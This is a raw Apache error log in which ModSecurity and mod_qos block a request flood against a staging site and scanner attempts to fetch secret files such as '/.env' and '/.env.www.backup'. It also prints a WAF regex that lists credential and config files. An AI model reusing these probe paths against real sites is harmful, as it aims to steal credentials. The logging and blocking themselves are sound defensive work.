[Tue May 26 19:55:18.370245 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S_wAAAbE"]
[Tue May 26 19:55:18.374151 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZrwAAAA8"]
[Tue May 26 19:55:18.375389 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TBAAAAfw"]
[Tue May 26 19:55:18.375971 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S-wAAAeA"]
[Tue May 26 19:55:18.378461 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TCQAAAgE"]
[Tue May 26 19:55:18.384895 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25S_QAAAgQ"]
[Tue May 26 19:55:18.394694 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZsgAAAD0"]
[Tue May 26 19:55:18.396981 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZsAAAAAQ"]
[Tue May 26 19:55:18.402716 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZsQAAAAM"]
[Tue May 26 19:55:18.421523 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ5gAAACk"]
[Tue May 26 19:55:18.424889 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZqwAAAHM"]
[Tue May 26 19:55:18.437918 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ4QAAAAk"]
[Tue May 26 19:55:18.441855 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TLQAAAdA"]
[Tue May 26 19:55:18.442541 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ5wAAAHs"]
[Tue May 26 19:55:18.444443 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25THAAAAgU"]
[Tue May 26 19:55:18.453441 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTkqK9k_ZUB2Vp25TCgAAAf0"]
[Tue May 26 19:55:18.457773 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ6QAAABM"]
[Tue May 26 19:55:18.458210 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ6AAAADc"]
[Tue May 26 19:55:18.466543 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ0AAAAGw"]
[Tue May 26 19:55:18.469559 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ5AAAABA"]
[Tue May 26 19:55:18.473889 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ5QAAAHU"]
[Tue May 26 19:55:18.477291 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ4wAAADE"]
[Tue May 26 19:55:18.477792 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ7AAAADo"]
[Tue May 26 19:55:18.478319 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaAwAAAAI"]
[Tue May 26 19:55:18.612367 2026] [security2:error] [pid 93576:tid 93808] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.www.backup"] [unique_id "ahWtTmDRMqfxdEDkoszaJAAAAGA"]
[Tue May 26 19:55:18.621080 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TbQAAAgE
[Tue May 26 19:55:18.621993 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TbgAAAgE
[Tue May 26 19:55:18.623578 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TbwAAAgk
[Tue May 26 19:55:18.625357 2026] [qos:error] [pid 93868:tid 94381] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TcAAAAgo
[Tue May 26 19:55:18.626448 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TcQAAAfo
[Tue May 26 19:55:18.629138 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TcwAAAfE
[Tue May 26 19:55:18.631376 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TdAAAAZ4
[Tue May 26 19:55:18.635506 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszaLgAAACg
[Tue May 26 19:55:18.635576 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtTkqK9k_ZUB2Vp25TdgAAAe0
[Tue May 26 19:55:18.639664 2026] [qos:error] [pid 93868:tid 94278] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTkqK9k_ZUB2Vp25TeQAAAaM
[Tue May 26 19:55:18.640003 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTkqK9k_ZUB2Vp25TegAAAdQ
[Tue May 26 19:55:18.775904 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TfwAAAdA
[Tue May 26 19:55:18.776070 2026] [qos:error] [pid 93868:tid 94376] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TgAAAAgU
[Tue May 26 19:55:18.776102 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TfgAAAa4
[Tue May 26 19:55:18.778063 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TgQAAAf0
[Tue May 26 19:55:18.781110 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTkqK9k_ZUB2Vp25TgwAAAac
[Tue May 26 19:55:18.786594 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25ThQAAAeg
[Tue May 26 19:55:18.788229 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTkqK9k_ZUB2Vp25ThgAAAZ8
[Tue May 26 19:55:18.790815 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTmDRMqfxdEDkoszaMQAAAA8
[Tue May 26 19:55:18.791274 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTmDRMqfxdEDkoszaMgAAABA
[Tue May 26 19:55:18.795851 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtTmDRMqfxdEDkoszaNAAAAA0
[Tue May 26 19:55:18.926253 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TjQAAAaY
[Tue May 26 19:55:18.926781 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TjAAAAck
[Tue May 26 19:55:18.927077 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TjgAAAe8
[Tue May 26 19:55:18.928495 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TkAAAAeM
[Tue May 26 19:55:18.928970 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TjwAAAck
[Tue May 26 19:55:18.933691 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TkQAAAcs
[Tue May 26 19:55:18.938437 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTmDRMqfxdEDkoszaOAAAACM
[Tue May 26 19:55:18.945952 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TkgAAAfQ
[Tue May 26 19:55:18.947336 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTmDRMqfxdEDkoszaOQAAADo
[Tue May 26 19:55:18.949019 2026] [security2:error] [pid 93576:tid 93759] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/settings/.env"] [unique_id "ahWtTmDRMqfxdEDkoszaOgAAAC8"]
[Tue May 26 19:55:18.962733 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtTkqK9k_ZUB2Vp25TkwAAAgE
[Tue May 26 19:55:19.077252 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TlgAAAZ4
[Tue May 26 19:55:19.077992 2026] [qos:error] [pid 93868:tid 94298] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TlwAAAbc
[Tue May 26 19:55:19.078436 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TmQAAAcQ
[Tue May 26 19:55:19.078958 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TmAAAAb8
[Tue May 26 19:55:19.081015 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TmgAAAcE
[Tue May 26 19:55:19.081913 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TnAAAAdw
[Tue May 26 19:55:19.085750 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT2DRMqfxdEDkoszaPQAAAAQ
[Tue May 26 19:55:19.101084 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TngAAAa8
[Tue May 26 19:55:19.101259 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT2DRMqfxdEDkoszaPgAAAEY
[Tue May 26 19:55:19.114345 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TnwAAAbI
[Tue May 26 19:55:19.227374 2026] [qos:error] [pid 93868:tid 94376] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25ToQAAAgU
[Tue May 26 19:55:19.228094 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TogAAAa4
[Tue May 26 19:55:19.228652 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TowAAAf0
[Tue May 26 19:55:19.230037 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TpAAAAac
[Tue May 26 19:55:19.232522 2026] [qos:error] [pid 93868:tid 94350] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TpQAAAes
[Tue May 26 19:55:19.233690 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT2DRMqfxdEDkoszaQgAAAA4
[Tue May 26 19:55:19.234561 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TpgAAAc8
[Tue May 26 19:55:19.254889 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:49146] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TpwAAAa0
[Tue May 26 19:55:19.255431 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT2DRMqfxdEDkoszaQwAAAHI
[Tue May 26 19:55:19.265835 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtT0qK9k_ZUB2Vp25TqAAAAZM
[Tue May 26 19:55:19.278015 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ7QAAACc"]
[Tue May 26 19:55:19.279186 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ4AAAAAA"]
[Tue May 26 19:55:19.281391 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ9wAAAF0"]
[Tue May 26 19:55:19.287392 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ4gAAACs"]
[Tue May 26 19:55:19.289729 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ6wAAABs"]
[Tue May 26 19:55:19.303485 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ3wAAAFg"]
[Tue May 26 19:55:19.307274 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ-AAAADA"]
[Tue May 26 19:55:19.309597 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ9QAAABY"]
[Tue May 26 19:55:19.329710 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ2gAAAAY"]
[Tue May 26 19:55:19.333105 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ7wAAAD4"]
[Tue May 26 19:55:19.336790 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszaAQAAAHQ"]
[Tue May 26 19:55:19.338404 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtTmDRMqfxdEDkoszZ9gAAADs"]
